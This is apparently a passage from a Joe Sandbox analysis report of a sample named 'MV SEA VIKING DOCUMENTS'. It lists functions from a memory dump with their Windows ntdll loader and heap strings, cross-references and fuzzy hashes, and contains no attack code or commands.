                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                                                                • API String ID: 0-1988757188
                                                                                                                                                                                                                                • Opcode ID: e3f968757618afd3f8de7789f530beea6e5b0be13a312d9f75ed15f8a937a679
                                                                                                                                                                                                                                • Instruction ID: 147af2ac81b5e115b09bae7f7f48b1fff0e5fc8d094258fdac65433e9b5d4191
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3f968757618afd3f8de7789f530beea6e5b0be13a312d9f75ed15f8a937a679
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33E11AB2A08B428FD716CE24C99075BBBE1BF89314F154B2DF855CB292E731E855CB81
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1ED690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F239153
                                                                                                                                                                                                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1F239372
                                                                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F239178
                                                                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 1F23914E, 1F239173
                                                                                                                                                                                                                                • GsHd, xrefs: 1F1ED794
                                                                                                                                                                                                                                • Actx , xrefs: 1F239315
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                                                                • API String ID: 3446177414-2196497285
                                                                                                                                                                                                                                • Opcode ID: be2bf1492d1c6a016c69cf6c8cd4ec64e0e30d1c67440b7076d83258ec2461f8
                                                                                                                                                                                                                                • Instruction ID: 03e1043a4e888afb3de16e7510254cd7f7f125176970a65692522b83c3273b91
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be2bf1492d1c6a016c69cf6c8cd4ec64e0e30d1c67440b7076d83258ec2461f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEE1D0B0B087428FD711CF29C9D0B4AB7E5BF89314F504A2DE9968B382D771E854CB92
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1C640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 1F1C651C
                                                                                                                                                                                                                                  • Part of subcall function 1F1C6565: RtlDebugPrintTimes.NTDLL ref: 1F1C6614
                                                                                                                                                                                                                                  • Part of subcall function 1F1C6565: RtlDebugPrintTimes.NTDLL ref: 1F1C665F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1F22977C
                                                                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1F229790
                                                                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1F2297B9
                                                                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 1F229783, 1F229796, 1F2297BF
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F2297A0, 1F2297C9
                                                                                                                                                                                                                                • apphelp.dll, xrefs: 1F1C6446
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-204845295
                                                                                                                                                                                                                                • Opcode ID: 0dec2a8d1a5562c3981841778e222f0c1db7a0b6fb0118517b57e4e619fd2152
                                                                                                                                                                                                                                • Instruction ID: cf6c3423c0390dcf0928f859cd9b434d6bf8802fefe1f1e00d68dc33dc5a2c9e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0dec2a8d1a5562c3981841778e222f0c1db7a0b6fb0118517b57e4e619fd2152
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4751CEB16083409BE311CF20C894AAA77E8AF84790F50095DF58A97660EA31F914CB93
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F24FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                                                                • API String ID: 3446177414-4227709934
                                                                                                                                                                                                                                • Opcode ID: 7a77a8f5c9c37ff52ff1ee47978b39d52b0a0208a8ad9d043603c21e45960935
                                                                                                                                                                                                                                • Instruction ID: 9b801d65005abd43783f8a86a1a0fb2ba90b73af7afd005215590d7062a229e6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a77a8f5c9c37ff52ff1ee47978b39d52b0a0208a8ad9d043603c21e45960935
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4416275A0021AAFCB05CF95C998EDEBBB5FF88354F200159EC44AB740D7B1AD12CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F27F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-3492000579
                                                                                                                                                                                                                                • Opcode ID: 6a8911d1888414459032582bec8a68eea49db29b2ce05edf5fa4e13de44b6a0b
                                                                                                                                                                                                                                • Instruction ID: 367423dc421b61ca7ab5c655fb98ecc2a53bfe30c216ef3917be648f3409292b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a8911d1888414459032582bec8a68eea49db29b2ce05edf5fa4e13de44b6a0b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31711335918685DFCB01CFA8C4A0AEEFBF1FF58310F14825AE4459B691DB35A952DB80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1C6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1F229885
                                                                                                                                                                                                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1F229843
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F229854, 1F229895
                                                                                                                                                                                                                                • LdrpLoadShimEngine, xrefs: 1F22984A, 1F22988B
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-3589223738
                                                                                                                                                                                                                                • Opcode ID: 231b02ba3b183b9b55ad7f3a34ac99c822bda77ee36e97b806acf733b7c8181a
                                                                                                                                                                                                                                • Instruction ID: 901b628910f4173a750f3c7eba99fe205b76963284f6216d45d4c16f4ef0783a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 231b02ba3b183b9b55ad7f3a34ac99c822bda77ee36e97b806acf733b7c8181a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D514475B103A49FDB04CBA8CC98ADD7BB2AF50310F140569E446AF695DB75BC24CB81
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1FD6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 1F1FD879
                                                                                                                                                                                                                                  • Part of subcall function 1F1D4779: RtlDebugPrintTimes.NTDLL ref: 1F1D4817
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-1975516107
                                                                                                                                                                                                                                • Opcode ID: bd73098160c0ebd08778b028bd080b90c197485ea2755d7752db83efd50060e9
                                                                                                                                                                                                                                • Instruction ID: 1f658d24c1b487533485f3daa5d871ed96ade8575111273ba67c9bca58eb0de3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd73098160c0ebd08778b028bd080b90c197485ea2755d7752db83efd50060e9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C05123B5E04346CFCB04CFA4C5A87EEBBB1BF44318FA04259D4156B681D772B969CB80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F27ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • ---------------------------------------, xrefs: 1F27EDF9
                                                                                                                                                                                                                                • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1F27EDE3
                                                                                                                                                                                                                                • Entry Heap Size , xrefs: 1F27EDED
                                                                                                                                                                                                                                • HEAP: , xrefs: 1F27ECDD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                                                                                                • API String ID: 3446177414-1102453626
                                                                                                                                                                                                                                • Opcode ID: 58428899ed774d680c527d38ab8304d5ae1dc83deeb672658479cf33fe47b3cd
                                                                                                                                                                                                                                • Instruction ID: ef9e13a2a9ce95ca692daae6127c710b1c4a536ef9fd0a5fc1115c94b2001fd2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58428899ed774d680c527d38ab8304d5ae1dc83deeb672658479cf33fe47b3cd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B041A175A00662DFC704CF55C48895ABBF9FF5632472586AAD4099F710DB32FC52CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1D9046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                                                                • API String ID: 3446177414-1194432280
                                                                                                                                                                                                                                • Opcode ID: cbde2ba363ca61a2d49a7abb3d2d3696501fccdd2b44106d06a395b74e4f06ce
                                                                                                                                                                                                                                • Instruction ID: da4935f4cc0aaf74a59e1d141fc599c5e48e25d525aba0349102f2a9ead79db4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbde2ba363ca61a2d49a7abb3d2d3696501fccdd2b44106d06a395b74e4f06ce
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C8120B1D002699BDB31CF54CC44BDEB6B9AF09710F1141DAE90AB7290E771AE95CFA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1F237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 1F23A7A5
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F23A7AF
                                                                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1F23A79F
                                                                                                                                                                                                                                • apphelp.dll, xrefs: 1F1F2382
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 0-176724104
                                                                                                                                                                                                                                • Opcode ID: 43ee65d8693d92592b8370a3519770a2331c34ebb13967cff960dc2931e2defb
                                                                                                                                                                                                                                • Instruction ID: 834b14cd1d5202c56993b4d1ee0a2ea580dc078359faf17e3ba8a960db8ee0e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43ee65d8693d92592b8370a3519770a2331c34ebb13967cff960dc2931e2defb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 683128F9E00252EBE7108F19CCC8ADE77B5EB88714F2401A9E8016B650D771BD65CF41
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1CF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                • API String ID: 3446177414-3610490719
                                                                                                                                                                                                                                • Opcode ID: d7ea979a99ac4e98c5c8e8950cf0a7c2a9e726e36dd3d2f5217296e59364c512
                                                                                                                                                                                                                                • Instruction ID: e0990c4cc16c0b3a28db377c951d53798da9a1a5c6a1adc9e0b328ff9762ff10
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7ea979a99ac4e98c5c8e8950cf0a7c2a9e726e36dd3d2f5217296e59364c512
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96912371704B82EFC715CB24C8A4B6AB7E5FF94B00F110559F8418B685EB34F862DBA2
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1F9723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                                • API String ID: 3446177414-2283098728
                                                                                                                                                                                                                                • Opcode ID: 167b8f0255fb4461d12ed63bd80a5ed81bfd249cd6c184b7df96fe242ff0361f
                                                                                                                                                                                                                                • Instruction ID: cdf6bb072b5b0b541e6b01395733f405b2560aa6558d08e83d4fa56f83214576
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 167b8f0255fb4461d12ed63bd80a5ed81bfd249cd6c184b7df96fe242ff0361f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 275120716107429FC321EF39CD94A5A77A2BB88310F94076DE4578B691E775B838CB82
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F20C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 1F2480E9
                                                                                                                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 1F2480E2
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F2480F3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-1783798831
                                                                                                                                                                                                                                • Opcode ID: b4e714a5d6e01b40aa4741662913722a7b3bac80fa0e19cac3a06156df45f3cc
                                                                                                                                                                                                                                • Instruction ID: 865795231f0845a49d977a54cd3e9a927b13890e793fc14ce0260b436dd1a888
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4e714a5d6e01b40aa4741662913722a7b3bac80fa0e19cac3a06156df45f3cc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D412BB6554751ABC322EF24CC44B8B3BE8EF84720F10492AF88997650EB75F824CF95
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F2543D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • LdrpCheckRedirection, xrefs: 1F25450F
                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 1F254519
                                                                                                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1F254508
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                • API String ID: 3446177414-3154609507
                                                                                                                                                                                                                                • Opcode ID: db892bb2840c64f89cb7c3ece09e938a54a80afc0127c10c687f8eba4edc7883
                                                                                                                                                                                                                                • Instruction ID: 4006888160f3b8d4619a3dbdd5c2f186836f861b0dc075077cc7bf0dd65cccf9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db892bb2840c64f89cb7c3ece09e938a54a80afc0127c10c687f8eba4edc7883
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F941D1727543129BCB10CF68C864AD6F7E4EF88750B160699EC889B269E731FD00CB91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F255B90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
